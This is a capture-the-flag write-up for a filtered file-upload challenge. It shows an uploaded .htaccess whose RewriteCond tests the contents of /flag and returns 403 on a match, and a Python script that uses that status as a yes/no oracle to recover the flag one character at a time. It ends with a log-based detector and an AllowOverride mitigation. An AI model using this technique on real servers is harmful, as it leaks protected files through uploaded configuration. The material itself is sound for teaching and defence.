
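Compared with the previous upload challenge, this one adds some character filtering, and the backend also filters several keywords. The .htaccess file from the previous challenge no longer works, so I found a new one: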
```
RewriteEngine On
RewriteCond expr "file('/flag') =~ /{pattern}.*/"
RewriteRule ^ - [F]
```
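To use Rewrite, the engine has to be enabled first. RewriteCond works like an if. `^` is a regular expression that here matches everything, `-` means no redirect, and `[F]` returns 403. So the meaning is: if the expression is satisfied, every file returns 403.
For a detailed introduction, see https://www.cnblogs.com/sijidou/p/10856450.html
As before, first upload a file named test.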

Then upload the .htaccess to check whether the flag content starts with UniCTF.

A 403 response means it worked.

Check whether the flag content starts with UniCF.


From here it is just a matter of writing a script:
```python
import requests
import string

url = "http://80-b70977a2-3919-462d-a4b2-b68afe57ba69.challenge.ctfplus.cn/"
# Candidate characters tried at each position of the flag
CHAR_LIST = string.ascii_letters + string.digits + "{}_-@!"


def solve():
    session = requests.session()
    current_flag = "UniCTF"  # known prefix
    while True:
        found_in_round = False
        for char in CHAR_LIST:
            pattern = f"{current_flag}{char}"
            print(pattern)
            # .htaccess that answers 403 when /flag matches the candidate
            htaccess_content = f"""
RewriteEngine On
RewriteCond expr "file('/flag') =~ /{pattern}.*/"
RewriteRule ^ - [F]"""
            try:
                session.post(url, files={'file': ('.htaccess', htaccess_content.strip())})

                # Fetch the previously uploaded test file; the status is the oracle
                r = session.get(url + "upload/test")

                if r.status_code == 403:
                    current_flag += char
                    found_in_round = True
                    if char == "}":
                        return
                    break
            except Exception as e:
                print(f"Error: {e}")
                continue

        # No candidate matched at this position: stop
        if not found_in_round:
            break


if __name__ == "__main__":
    # Upload the test file that the oracle requests will fetch
    requests.post(url, files={'file': ("test", "test")})
    solve()
```
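Seen from the defender's side, the loop above leaves a recognisable trace in the web server's access log: one client repeatedly uploads and then fetches the same path, and that path's status flips between 403 and something else. The detector below is an added example, not part of the original writeup; the log lines, IP addresses, and the `min_probes` threshold are constructed assumptions.

```python
import re
from collections import defaultdict

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def find_oracle_clients(lines, min_probes=4):
    """Return {client: (path, probes, forbidden)} for clients whose log shows
    repeated POST-then-GET pairs where the fetched path flips between 403 and
    another status, i.e. the response is being used as a yes/no signal."""
    last_method = {}
    probes = defaultdict(list)  # (client, path) -> statuses of GETs right after a POST
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, path, status = m.group(1), m.group(2), m.group(3), int(m.group(4))
        if method == "GET" and last_method.get(client) == "POST":
            probes[(client, path)].append(status)
        last_method[client] = method
    hits = {}
    for (client, path), statuses in probes.items():
        forbidden = statuses.count(403)
        # Require enough probes and a mix of 403 and non-403 answers.
        if len(statuses) >= min_probes and 0 < forbidden < len(statuses):
            hits[client] = (path, len(statuses), forbidden)
    return hits


def _pair(client, sec, status):
    # Build one constructed upload request followed by one fetch.
    ts = f"10/Oct/2025:12:00:{sec:02d} +0000"
    return [f'{client} - - [{ts}] "POST / HTTP/1.1" 200 512',
            f'{client} - - [{ts}] "GET /upload/test HTTP/1.1" {status} 199']


# Constructed sample log (not from the page): 203.0.113.7 probes, 198.51.100.9 browses.
SAMPLE = []
for i, st in enumerate([200, 200, 403, 200, 403, 200]):
    SAMPLE += _pair("203.0.113.7", i, st)
SAMPLE += ['198.51.100.9 - - [10/Oct/2025:12:01:00 +0000] "POST / HTTP/1.1" 200 512',
           '198.51.100.9 - - [10/Oct/2025:12:01:02 +0000] "GET /upload/photo.png HTTP/1.1" 200 4096']

if __name__ == "__main__":
    for client, (path, n, f) in find_oracle_clients(SAMPLE).items():
        print(f"{client}: {n} upload-then-fetch probes of {path}, {f} returned 403")
```

Serving the upload directory with `AllowOverride None` stops Apache from reading an uploaded .htaccess at all, which removes the oracle rather than only detecting it.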